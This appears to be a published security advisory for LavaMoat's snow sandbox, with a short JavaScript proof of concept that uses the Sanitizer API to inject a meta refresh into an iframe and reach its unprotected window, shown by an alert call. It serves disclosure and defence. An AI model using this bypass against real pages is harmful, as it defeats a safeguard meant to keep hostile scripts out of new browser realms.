snow
snow copied to clipboard
Published
20 hours ago •
LavaMoat
LavaMoat
Snow can be bypassed with meta and the HTML sanitizer
This is similar #142 but I use the Sanitizer API to inject the meta tag
i=document.createElement('iframe');
i.src=123;
i.name='xyz';
counter=0;
i.onload=x=>{
i.contentDocument.body.setHTML('<meta http-equiv="refresh" content="0">',
{sanitizer:new Sanitizer({allowElements: [ "meta" ],allowAttributes:{"http-equiv":["meta"],"content":["meta"]}})});
counter++;
if(counter>1){
i.onload=null;
}
};
setInterval(x=>xyz.alert(1337),0);
document.body.append(i);
